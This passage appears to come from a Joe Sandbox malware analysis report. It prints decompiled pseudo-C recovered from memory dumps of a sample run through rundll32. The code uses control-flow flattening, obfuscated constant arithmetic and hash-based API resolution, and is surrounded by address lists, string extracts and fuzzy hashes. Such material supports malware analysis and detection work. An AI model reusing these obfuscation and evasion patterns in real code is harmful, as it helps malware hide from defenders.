							continue;
						} else {
							if(_t249 == 0x15047ce) {
								_push(_t238);
								_push(_t238);
								_t224 = E007A474B();
								_t251 =  &(_t251[2]);
								_t249 = 0xe32aaf2;
								_t248 = _t248 + _t224;
								continue;
							} else {
								if(_t249 == 0x4d33fe3) {
									_push(_t238);
									_push(_t238);
									_t228 = E007A474B();
									_t251 =  &(_t251[2]);
									_t249 = 0xe45b300;
									_t248 = _t248 + _t228;
									continue;
								} else {
									if(_t249 == 0x708a22e) {
										_t238 = _v56;
										_t229 = E007BC2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
										_t251 =  &(_t251[3]);
										_t249 = 0x15047ce;
										_t248 = _t248 + _t229;
										continue;
									} else {
										if(_t249 != 0x70e2d06) {
											goto L17;
										} else {
											_push(_t238);
											_push(_t238);
											_t233 = E007A474B();
											_t251 =  &(_t251[2]);
											_t249 = 0x4d33fe3;
											_t248 = _t248 + _t233;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t248;
					}
					if(_t249 == 0xe32aaf2) {
						_push(_t238);
						_push(_t238);
						_t214 = E007A474B();
						_t251 =  &(_t251[2]);
						_t249 = 0xe145aac;
						_t248 = _t248 + _t214;
						goto L17;
					} else {
						if(_t249 == 0xe45b300) {
							_t248 = _t248 + E007BC2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
						} else {
							if(_t249 != 0xe982267) {
								goto L17;
							} else {
								_t249 = 0x708a22e;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t249 != 0xce30a1f);
				goto L20;
			}

0x007bc631
0x007bc638
0x007bc63a
0x007bc644
0x007bc649
0x007bc64e
0x007bc656
0x007bc65e
0x007bc666
0x007bc66e
0x007bc676
0x007bc67e
0x007bc682
0x007bc68a
0x007bc692
0x007bc697
0x007bc69f
0x007bc6a7
0x007bc6af
0x007bc6b7
0x007bc6bf
0x007bc6c7
0x007bc6cf
0x007bc6d7
0x007bc6e2
0x007bc6e4
0x007bc6e9
0x007bc6ef
0x007bc6f7
0x007bc6fc
0x007bc704
0x007bc70c
0x007bc714
0x007bc719
0x007bc721
0x007bc729
0x007bc731
0x007bc736
0x007bc73e
0x007bc746
0x007bc74b
0x007bc750
0x007bc758
0x007bc760
0x007bc76c
0x007bc771
0x007bc777
0x007bc77f
0x007bc787
0x007bc793
0x007bc796
0x007bc79a
0x007bc7a2
0x007bc7aa
0x007bc7b7
0x007bc7bb
0x007bc7c3
0x007bc7d0
0x007bc7d4
0x007bc7d9
0x007bc7e1
0x007bc7e9
0x007bc7f1
0x007bc7f9
0x007bc801
0x007bc813
0x007bc817
0x007bc81f
0x007bc827
0x007bc834
0x007bc838
0x007bc840
0x007bc848
0x007bc850
0x007bc858
0x007bc860
0x007bc868
0x007bc870
0x007bc878
0x007bc880
0x007bc888
0x007bc890
0x007bc898
0x007bc8a5
0x007bc8ae
0x007bc8b2
0x007bc8ba
0x007bc8c2
0x007bc8ca
0x007bc8cf
0x007bc8d7
0x007bc8df
0x007bc8e4
0x007bc8e9
0x007bc8f1
0x007bc8f9
0x007bc901
0x007bc909
0x007bc911
0x007bc911
0x007bc919
0x007bc919
0x007bc919
0x007bc919
0x007bc91b
0x00000000
0x00000000
0x007bc921
0x007bc9e2
0x007bc9e3
0x007bc9e4
0x007bc9e9
0x007bc9ec
0x007bc9f1
0x00000000
0x007bc927
0x007bc92d
0x007bc9c0
0x007bc9c1
0x007bc9c2
0x007bc9c7
0x007bc9ca
0x007bc9cf
0x00000000
0x007bc933
0x007bc939
0x007bc99e
0x007bc99f
0x007bc9a0
0x007bc9a5
0x007bc9a8
0x007bc9ad
0x00000000
0x007bc93b
0x007bc941
0x007bc97d
0x007bc981
0x007bc986
0x007bc989
0x007bc98e
0x00000000
0x007bc943
0x007bc949
0x00000000
0x007bc94f
0x007bc95b
0x007bc95c
0x007bc95d
0x007bc962
0x007bc965
0x007bc96a
0x00000000
0x007bc96a
0x007bc949
0x007bc941
0x007bc939
0x007bc92d
0x007bca5f
0x007bca68
0x007bca68
0x007bc9fe
0x007bca26
0x007bca27
0x007bca28
0x007bca2d
0x007bca30
0x007bca32
0x00000000
0x007bca00
0x007bca06
0x007bca5d
0x007bca08
0x007bca0e
0x00000000
0x007bca10
0x007bca10
0x00000000
0x007bca10
0x007bca0e
0x007bca06
0x00000000
0x007bca34
0x007bca34
0x00000000

Strings

)L, xrefs: 007BC7A2
QGf, xrefs: 007BC8F1
%l, xrefs: 007BC63A
i _, xrefs: 007BC838
Z$,, xrefs: 007BC729
}+, xrefs: 007BC8D7
Eh, xrefs: 007BC697
w)!, xrefs: 007BC6C7

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
API String ID: 0-1553751006
Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
Instruction ID: 440c0c4aad59d41b3b7e89cca0fb0f44163e2d70a3ee9e01b13529f38e440944
Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
Instruction Fuzzy Hash: 78A121B28083409FD359CF25D48A54FFBE1BBC5758F508A1DF595A6220D3B9DA09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 007BF435 Relevance: 9.3, Strings: 7, Instructions: 536
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E007BF435(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				void* _t551;
				void* _t554;
				signed int _t560;
				void* _t563;
				int _t566;
				void* _t580;
				signed int* _t582;
				void* _t587;
				signed int _t595;
				void* _t598;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				intOrPtr* _t610;
				signed int _t634;
				void* _t659;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				void* _t682;
				void* _t683;
				void* _t686;
				void* _t687;
				signed int _t692;
				signed int _t693;
				signed int* _t694;
				void* _t698;

				_t694 =  &_v520;
				_v296 = __edx;
				_v456 = __ecx;
				_v308 = 0x7c82e0;
				_v308 = _v308 ^ 0x9529f8b7;
				_v308 = _v308 ^ 0x95557a57;
				_v444 = 0xbd655a;
				_v444 = _v444 + 0x6586;
				_v444 = _v444 + 0xffff1486;
				_v444 = _v444 ^ 0x00b10b5d;
				_v360 = 0x6df28f;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0xc93a0f00;
				_v360 = _v360 ^ 0xc93b57a7;
				_v380 = 0x803da4;
				_v380 = _v380 + 0x81b0;
				_v380 = _v380 << 0x10;
				_v380 = _v380 ^ 0xbf59b73f;
				_v484 = 0xdeaf13;
				_v484 = _v484 | 0x05ba16e8;
				_v484 = _v484 + 0xffff5e7b;
				_v484 = _v484 + 0x21a5;
				_v484 = _v484 ^ 0x05f35408;
				_v516 = 0x9c12e3;
				_v516 = _v516 >> 5;
				_v516 = _v516 + 0x3879;
				_t686 = 0x618a3a9;
				_t676 = 0x46;
				_v516 = _v516 / _t676;
				_v516 = _v516 ^ 0x000beb5e;
				_v404 = 0x49e9fe;
				_v404 = _v404 + 0x1375;
				_v404 = _v404 | 0x014362a3;
				_v404 = _v404 ^ 0x01430578;
				_v408 = 0xd49d0c;
				_v408 = _v408 + 0x89ee;
				_v408 = _v408 | 0xbbfa4d8a;
				_v408 = _v408 ^ 0xbbf95772;
				_v504 = 0x33cefe;
				_v504 = _v504 >> 0xa;
				_v504 = _v504 >> 0xd;
				_v504 = _v504 + 0xffff4738;
				_v504 = _v504 ^ 0xfff61340;
				_v388 = 0x38423a;
				_t75 =  &_v388; // 0x38423a
				_t601 = 0x7b;
				_v388 =  *_t75 * 0x2c;
				_v388 = _v388 + 0x7a90;
				_v388 = _v388 ^ 0x09a92ca6;
				_v396 = 0x89c34a;
				_v396 = _v396 >> 6;
				_v396 = _v396 | 0xaa955d3e;
				_v396 = _v396 ^ 0xaa9cf099;
				_v316 = 0x54e1fb;
				_v316 = _v316 + 0xffff88b2;
				_v316 = _v316 ^ 0x0053b1cb;
				_v392 = 0xd67855;
				_v392 = _v392 + 0xd739;
				_v392 = _v392 * 0x34;
				_v392 = _v392 ^ 0x2bb8cf2c;
				_v512 = 0x9dc1ac;
				_v512 = _v512 | 0xff1b5e8c;
				_v512 = _v512 / _t601;
				_v512 = _v512 + 0xc237;
				_v512 = _v512 ^ 0x02115509;
				_v368 = 0xb0c27;
				_v368 = _v368 * 0x3a;
				_v368 = _v368 + 0x9417;
				_v368 = _v368 ^ 0x028ae81d;
				_v352 = 0x7ea940;
				_v352 = _v352 + 0xffff6a40;
				_v352 = _v352 | 0x1d7a7563;
				_v352 = _v352 ^ 0x1d74a207;
				_v340 = 0xd37cb9;
				_v340 = _v340 >> 5;
				_v340 = _v340 ^ 0x00021b7e;
				_v384 = 0xc54f7c;
				_v384 = _v384 | 0xe1c129a4;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0x7152788e;
				_v320 = 0xafdf9b;
				_v320 = _v320 | 0x588bef45;
				_v320 = _v320 ^ 0x58ad1127;
				_v508 = 0x7882a6;
				_v508 = _v508 ^ 0x5ae648f7;
				_t677 = 0x7e;
				_v508 = _v508 / _t677;
				_v508 = _v508 + 0xffff266f;
				_v508 = _v508 ^ 0x00b4570c;
				_v344 = 0x25ec7c;
				_t158 =  &_v344; // 0x25ec7c
				_t692 = 0x77;
				_v344 =  *_t158 * 0x48;
				_v344 = _v344 ^ 0x0aab681c;
				_v332 = 0xac456;
				_v332 = _v332 ^ 0x143b2d92;
				_v332 = _v332 ^ 0x1438ce6d;
				_v436 = 0x1dd68;
				_v436 = _v436 + 0x1e14;
				_v436 = _v436 / _t692;
				_v436 = _v436 ^ 0x000407e3;
				_v468 = 0x975814;
				_v468 = _v468 | 0x165c3dad;
				_v468 = _v468 >> 3;
				_v468 = _v468 + 0x9a99;
				_v468 = _v468 ^ 0x02d4af38;
				_v428 = 0xd1fa32;
				_v428 = _v428 + 0x34cd;
				_v428 = _v428 >> 0xa;
				_v428 = _v428 ^ 0x000c7c43;
				_v372 = 0xb93604;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 + 0x569f;
				_v372 = _v372 ^ 0x0001c97c;
				_v312 = 0xb8b780;
				_v312 = _v312 / _t601;
				_v312 = _v312 ^ 0x0009bb57;
				_v364 = 0xc6b8c5;
				_v364 = _v364 >> 4;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0x35c8234d;
				_v500 = 0x5d2db3;
				_v500 = _v500 | 0xa4ec7bca;
				_v500 = _v500 * 0x42;
				_v500 = _v500 + 0xffff6871;
				_v500 = _v500 ^ 0x8955fb09;
				_v492 = 0xf8ac1c;
				_v492 = _v492 + 0xd489;
				_v492 = _v492 | 0x938b5662;
				_v492 = _v492 << 6;
				_v492 = _v492 ^ 0xfef6fac0;
				_v356 = 0x80a8a7;
				_v356 = _v356 >> 3;
				_v356 = _v356 + 0xffff1aa9;
				_v356 = _v356 ^ 0x00023cc5;
				_v420 = 0x29f504;
				_v420 = _v420 ^ 0x96d25191;
				_v420 = _v420 << 0xa;
				_v420 = _v420 ^ 0xee96722c;
				_v476 = 0x6526e6;
				_t250 =  &_v476; // 0x6526e6
				_t602 = 9;
				_t678 = 0x5e;
				_v476 =  *_t250 * 0x65;
				_t252 =  &_v476; // 0x6526e6
				_v476 =  *_t252 * 0x5d;
				_v476 = _v476 + 0xffffa50d;
				_v476 = _v476 ^ 0x7f6d4504;
				_v304 = 0x6f90;
				_v304 = _v304 + 0xffffb625;
				_v304 = _v304 ^ 0x0000ce69;
				_v348 = 0xd48165;
				_v348 = _v348 * 0x4f;
				_v348 = _v348 + 0xa298;
				_v348 = _v348 ^ 0x41980148;
				_v412 = 0x7e685b;
				_t271 =  &_v412; // 0x7e685b
				_v412 =  *_t271 * 0x1d;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 ^ 0x000f1110;
				_v460 = 0xd80dae;
				_v460 = _v460 * 0x4a;
				_v460 = _v460 << 9;
				_v460 = _v460 >> 5;
				_v460 = _v460 ^ 0x073a202e;
				_v324 = 0x2acd4f;
				_v324 = _v324 ^ 0x1744d618;
				_v324 = _v324 ^ 0x1766082c;
				_v400 = 0xe6723b;
				_v400 = _v400 ^ 0x220d80d9;
				_v400 = _v400 ^ 0x0161a8c1;
				_v400 = _v400 ^ 0x238d1a3c;
				_v376 = 0xaaa6;
				_v376 = _v376 + 0xd31a;
				_v376 = _v376 + 0xfffff53b;
				_v376 = _v376 ^ 0x00079406;
				_v452 = 0xe6cc76;
				_v452 = _v452 ^ 0xa4c29e28;
				_v452 = _v452 / _t602;
				_v452 = _v452 ^ 0x123fe3c8;
				_v520 = 0x822cac;
				_v520 = _v520 / _t678;
				_v520 = _v520 << 4;
				_v520 = _v520 << 9;
				_v520 = _v520 ^ 0x2c5f9d39;
				_v440 = 0xafb195;
				_v440 = _v440 + 0xffff123a;
				_v440 = _v440 >> 0xa;
				_v440 = _v440 ^ 0x0003dc41;
				_v448 = 0xdf86e4;
				_v448 = _v448 ^ 0xac60bb5d;
				_v448 = _v448 ^ 0x5238faed;
				_v448 = _v448 ^ 0xfe8be764;
				_v336 = 0x3e14c9;
				_v336 = _v336 << 7;
				_v336 = _v336 ^ 0x1f0fc953;
				_v496 = 0x4885f3;
				_v496 = _v496 * 0x25;
				_v496 = _v496 + 0x3aa8;
				_v496 = _v496 + 0xffff73aa;
				_v496 = _v496 ^ 0x0a7b30ee;
				_v480 = 0xca6b34;
				_v480 = _v480 >> 9;
				_v480 = _v480 + 0xfb6a;
				_v480 = _v480 / _t692;
				_v480 = _v480 ^ 0x000164ed;
				_v432 = 0xb19133;
				_t679 = 0x63;
				_t693 = _v296;
				_v432 = _v432 * 0x53;
				_v432 = _v432 >> 0x10;
				_v432 = _v432 ^ 0x00018cb4;
				_v328 = 0xdb466c;
				_t603 = _v296;
				_v328 = _v328 / _t679;
				_v328 = _v328 ^ 0x000e2190;
				_v488 = 0xd48740;
				_t680 = 0x44;
				_v488 = _v488 * 7;
				_v488 = _v488 * 0x66;
				_v488 = _v488 + 0x34f;
				_v488 = _v488 ^ 0x50c19e73;
				_v424 = 0xacfab2;
				_v424 = _v424 / _t680;
				_v424 = _v424 | 0xedf008b5;
				_v424 = _v424 ^ 0xedf22909;
				_v472 = 0x2e74a8;
				_v472 = _v472 * 0x3f;
				_v472 = _v472 ^ 0x6424471f;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 ^ 0x0009d0c0;
				_v416 = 0x7e19d4;
				_v416 = _v416 << 0xd;
				_v416 = _v416 + 0x1081;
				_v416 = _v416 ^ 0xc3344569;
				_v464 = 0xa74bb7;
				_v464 = _v464 >> 0xb;
				_v464 = _v464 + 0x9c4;
				_v464 = _v464 >> 6;
				_v464 = _v464 ^ 0x000976a8;
				while(1) {
					L1:
					_t551 = 0xf168e34;
					do {
						while(1) {
							L2:
							_t698 = _t686 - 0x7498ebf;
							if(_t698 > 0) {
								break;
							}
							if(_t698 == 0) {
								_push(_v496);
								_push(_v336);
								_push(_v448);
								_t580 = E007A7F1D(_v480, _t603, _v432, E007B8606(_v440, 0x7a1560, __eflags), _v328, _v292 - _t603, _v488);
								E007AA8B0(_v424, _t577, _v472);
								_t582 = _v296;
								 *_t582 = _t693;
								_t582[1] = _t603 + _t580 - _t693;
								goto L29;
							}
							if(_t686 == 0x488924) {
								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
								_push(_t610);
								_push(_t610);
								_t693 = E007A7FF2(_t682);
								__eflags = _t693;
								_t551 = 0xf168e34;
								_t610 = _v456;
								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
								continue;
							}
							if(_t686 == 0x123a276) {
								_push(_v468);
								_push(_v436);
								_t587 = E007BDCF7(_v332, 0x7a15c0, __eflags);
								_push( &_v256);
								_push(_t587);
								_push(_t682);
								_push(_v300);
								 *((intOrPtr*)(E007AA42D(0xab2a8d8a, 0x2b7)))();
								E007AA8B0(_v428, _t587, _v372);
								_t694 =  &(_t694[5]);
								_t686 = 0x488924;
								L12:
								_t610 = _v456;
								while(1) {
									L1:
									_t551 = 0xf168e34;
									goto L2;
								}
							}
							if(_t686 != 0x57ff6e7) {
								if(_t686 == 0x5f676f3) {
									_t598 = E007B0AE0(8, 1);
									_push(_v516);
									_t682 = _t598;
									_push( &_v288);
									_push(_t682);
									_push(9);
									E007A80E3(_v380, _v484);
									_t686 = 0x7f96e60;
									L11:
									_t694 =  &(_t694[6]);
									goto L12;
								} else {
									if(_t686 != 0x618a3a9) {
										goto L28;
									} else {
										_t686 = 0x5f676f3;
										continue;
									}
								}
								L30:
								return _t595;
							}
							_t682 = 0x4000;
							_push(_t610);
							_push(_t610);
							_t595 = E007A7FF2(0x4000);
							_v300 = _t595;
							__eflags = _t595;
							if(__eflags != 0) {
								_t686 = 0x123a276;
								goto L12;
							}
							goto L30;
						}
						__eflags = _t686 - 0x7f96e60;
						if(_t686 == 0x7f96e60) {
							_t554 = E007B0AE0(0x10, 4);
							_push(_v396);
							_t682 = _t554;
							_push( &_v128);
							_push(_t682);
							_push(0xb);
							E007A80E3(_v504, _v388);
							_t610 = _v456;
							_t694 =  &(_t694[6]);
							_t686 = 0x8d9b717;
							_t551 = 0xf168e34;
							goto L28;
						} else {
							__eflags = _t686 - 0x8d9b717;
							if(_t686 == 0x8d9b717) {
								_t687 =  &_v256;
								_t659 = E007B0AE0(0x10, 8);
								_t560 = _v308;
								__eflags = _t560 - _t659;
								if(_t560 < _t659) {
									_t675 = _t659 - _t560;
									_t683 = _t687;
									_t634 = _t675 >> 1;
									__eflags = _t634;
									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
									asm("adc ecx, ecx");
									_t687 = _t687 + _t675 * 2;
									memset(_t683 + _t634, _t566, 0);
									_t694 =  &(_t694[6]);
								}
								_t563 = E007B0AE0(0x10, 8);
								_push(_v384);
								_t682 = _t563;
								_push(_t687);
								_push(_t682);
								_push(0xb);
								E007A80E3(_v352, _v340);
								_t686 = 0x57ff6e7;
								goto L11;
							} else {
								__eflags = _t686 - 0xa9d081a;
								if(_t686 == 0xa9d081a) {
									E007AED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
									_t610 = _v456;
									_t694 =  &(_t694[3]);
									_t686 = 0x7498ebf;
									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
									goto L1;
								} else {
									__eflags = _t686 - 0xe639f63;
									if(_t686 == 0xe639f63) {
										E007B8519(_v416, _v464, _v300);
										return 0;
									}
									__eflags = _t686 - _t551;
									if(__eflags != 0) {
										goto L28;
									} else {
										_push(_v476);
										_push(_v420);
										_v292 = _t682 + _t693;
										_push(_v356);
										_t603 = E007BC0C1( &_v128, __eflags,  &_v288, E007B8606(_v492, 0x7a1610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
										E007AA8B0(_v400, _t572, _v376);
										_t694 =  &(_t694[0xd]);
										_t686 = 0xa9d081a;
										goto L12;
									}
								}
							}
						}
						goto L30;
						L28:
						__eflags = _t686 - 0x7bf1275;
					} while (__eflags != 0);
					L29:
					return _v300;
				}
			}

0x007bf435
0x007bf43f
0x007bf446
0x007bf44a
0x007bf455
0x007bf460
0x007bf46b
0x007bf473
0x007bf47b
0x007bf483
0x007bf48b
0x007bf496
0x007bf49e
0x007bf4a9
0x007bf4b4
0x007bf4bf
0x007bf4ca
0x007bf4d2
0x007bf4dd
0x007bf4e5
0x007bf4ed
0x007bf4f5
0x007bf4fd
0x007bf505
0x007bf50d
0x007bf512
0x007bf51e
0x007bf527
0x007bf52c
0x007bf532
0x007bf53a
0x007bf545
0x007bf550
0x007bf55b
0x007bf566
0x007bf571
0x007bf57c
0x007bf587
0x007bf592
0x007bf59a
0x007bf59f
0x007bf5a4
0x007bf5ac
0x007bf5b4
0x007bf5bf
0x007bf5c7
0x007bf5c8
0x007bf5cf
0x007bf5da
0x007bf5e5
0x007bf5f0
0x007bf5f8
0x007bf603
0x007bf60e
0x007bf619
0x007bf624
0x007bf62f
0x007bf63a
0x007bf64d
0x007bf654
0x007bf65f
0x007bf667
0x007bf675
0x007bf679
0x007bf681
0x007bf689
0x007bf69c
0x007bf6a3
0x007bf6ae
0x007bf6bb
0x007bf6c6
0x007bf6d1
0x007bf6dc
0x007bf6e7
0x007bf6f2
0x007bf6fa
0x007bf705
0x007bf710
0x007bf71b
0x007bf723
0x007bf72e
0x007bf739
0x007bf744
0x007bf74f
0x007bf757
0x007bf765
0x007bf76a
0x007bf76e
0x007bf776
0x007bf77e
0x007bf789
0x007bf793
0x007bf794
0x007bf79b
0x007bf7a6
0x007bf7b1
0x007bf7bc
0x007bf7c7
0x007bf7cf
0x007bf7df
0x007bf7e3
0x007bf7eb
0x007bf7f3
0x007bf7fb
0x007bf800
0x007bf808
0x007bf810
0x007bf818
0x007bf820
0x007bf825
0x007bf82d
0x007bf838
0x007bf840
0x007bf84b
0x007bf856
0x007bf86a
0x007bf871
0x007bf87c
0x007bf887
0x007bf88f
0x007bf897
0x007bf8a2
0x007bf8aa
0x007bf8b7
0x007bf8bb
0x007bf8c3
0x007bf8cb
0x007bf8d3
0x007bf8db
0x007bf8e3
0x007bf8e8
0x007bf8f0
0x007bf8fb
0x007bf903
0x007bf90e
0x007bf919
0x007bf921
0x007bf929
0x007bf930
0x007bf938
0x007bf940
0x007bf947
0x007bf94a
0x007bf94b
0x007bf94f
0x007bf954
0x007bf958
0x007bf960
0x007bf968
0x007bf973
0x007bf97e
0x007bf989
0x007bf99c
0x007bf9a3
0x007bf9ae
0x007bf9b9
0x007bf9c1
0x007bf9c6
0x007bf9ca
0x007bf9cf
0x007bf9d7
0x007bf9e4
0x007bf9e8
0x007bf9ed
0x007bf9f2
0x007bf9fa
0x007bfa05
0x007bfa10
0x007bfa1b
0x007bfa26
0x007bfa31
0x007bfa3c
0x007bfa47
0x007bfa52
0x007bfa5d
0x007bfa68
0x007bfa73
0x007bfa7b
0x007bfa8b
0x007bfa8f
0x007bfa97
0x007bfaa7
0x007bfaab
0x007bfab0
0x007bfab5
0x007bfabd
0x007bfac5
0x007bfacd
0x007bfad2
0x007bfada
0x007bfae2
0x007bfaea
0x007bfaf2
0x007bfafa
0x007bfb05
0x007bfb0d
0x007bfb18
0x007bfb25
0x007bfb29
0x007bfb31
0x007bfb39
0x007bfb41
0x007bfb49
0x007bfb4e
0x007bfb5c
0x007bfb62
0x007bfb6a
0x007bfb79
0x007bfb7c
0x007bfb83
0x007bfb87
0x007bfb8c
0x007bfb94
0x007bfbaa
0x007bfbb1
0x007bfbb8
0x007bfbc3
0x007bfbd0
0x007bfbd1
0x007bfbda
0x007bfbde
0x007bfbe6
0x007bfbee
0x007bfc03
0x007bfc07
0x007bfc0f
0x007bfc17
0x007bfc24
0x007bfc28
0x007bfc30
0x007bfc35
0x007bfc3d
0x007bfc45
0x007bfc4a
0x007bfc52
0x007bfc5a
0x007bfc62
0x007bfc67
0x007bfc6f
0x007bfc74
0x007bfc7c
0x007bfc7c
0x007bfc7c
0x007bfc81
0x007bfc81
0x007bfc81
0x007bfc81
0x007bfc87
0x00000000
0x00000000
0x007bfc8d
0x007bffc3
0x007bffcc
0x007bffd3
0x007c000b
0x007c001f
0x007c0024
0x007c0030
0x007c0032
0x00000000
0x007c0032
0x007bfc99
0x007bfdb2
0x007bfdc5
0x007bfdc6
0x007bfdcc
0x007bfdd4
0x007bfdd6
0x007bfddc
0x007bfde0
0x00000000
0x007bfde0
0x007bfca5
0x007bfd4c
0x007bfd55
0x007bfd60
0x007bfd75
0x007bfd76
0x007bfd77
0x007bfd78
0x007bfd8a
0x007bfd9c
0x007bfda1
0x007bfda4
0x007bfd0b
0x007bfd0b
0x007bfc7c
0x007bfc7c
0x007bfc7c
0x00000000
0x007bfc7c
0x007bfc7c
0x007bfcb1
0x007bfcb9
0x007bfcdd
0x007bfce2
0x007bfcea
0x007bfcfa
0x007bfcfb
0x007bfcfc
0x007bfcfe
0x007bfd03
0x007bfd08
0x007bfd08
0x00000000
0x007bfcbb
0x007bfcc1
0x00000000
0x007bfcc7
0x007bfcc7
0x00000000
0x007bfcc7
0x007bfcc1
0x007bffc2
0x007bffc2
0x007bffc2
0x007bfd1b
0x007bfd2d
0x007bfd2e
0x007bfd2f
0x007bfd34
0x007bfd3d
0x007bfd3f
0x007bfd45
0x00000000
0x007bfd45
0x00000000
0x007bfd3f
0x007bfde8
0x007bfdee
0x007bff6b
0x007bff70
0x007bff7e
0x007bff8b
0x007bff8c
0x007bff8d
0x007bff8f
0x007bff94
0x007bff98
0x007bff9b
0x007bffa0
0x00000000
0x007bfdf4
0x007bfdf4
0x007bfdfa
0x007bfede
0x007bfef5
0x007bfef7
0x007bff00
0x007bff02
0x007bff04
0x007bff06
0x007bff0f
0x007bff0f
0x007bff11
0x007bff13
0x007bff15
0x007bff18
0x007bff18
0x007bff18
0x007bff2a
0x007bff2f
0x007bff3d
0x007bff46
0x007bff47
0x007bff48
0x007bff4a
0x007bff4f
0x00000000
0x007bfe00
0x007bfe00
0x007bfe06
0x007bfebe
0x007bfec3
0x007bfec7
0x007bfeca
0x007bfecf
0x00000000
0x007bfe0c
0x007bfe0c
0x007bfe12
0x007c0049
0x00000000
0x007c004f
0x007bfe18
0x007bfe1a
0x00000000
0x007bfe20
0x007bfe20
0x007bfe2c
0x007bfe30
0x007bfe37
0x007bfe9a
0x007bfe9d
0x007bfea2
0x007bfea5
0x00000000
0x007bfea5
0x007bfe1a
0x007bfe06
0x007bfdfa
0x00000000
0x007bffa5
0x007bffa5
0x007bffa5
0x007bffb1
0x00000000
0x007bffb1

Strings

&e, xrefs: 007BF940
;r, xrefs: 007BFA1B
y8, xrefs: 007BF512
:B8, xrefs: 007BF5BF
0{, xrefs: 007BFB39
[h~, xrefs: 007BF9C1
|%, xrefs: 007BF789

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :B8$;r$[h~$y8$|%$&e$0{
API String ID: 0-2624470838
Opcode ID: 46bae10e7665ee4fbbe920511fbccbae744f2411e46e357b9f8002d2e535cb16
Instruction ID: fc2c191f562b1d12cca08a39fb9b2f21d4b0396b32596a78a254c7cac3cb301a
Opcode Fuzzy Hash: 46bae10e7665ee4fbbe920511fbccbae744f2411e46e357b9f8002d2e535cb16
Instruction Fuzzy Hash: 905220725093809FD3B8CF25C58AB8BFBE1BBC5748F10891DE19996260DBB48949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 007AD6D8 Relevance: 9.2, Strings: 7, Instructions: 408
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E007AD6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* __ecx;
				intOrPtr _t400;
				void* _t407;
				signed int _t410;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
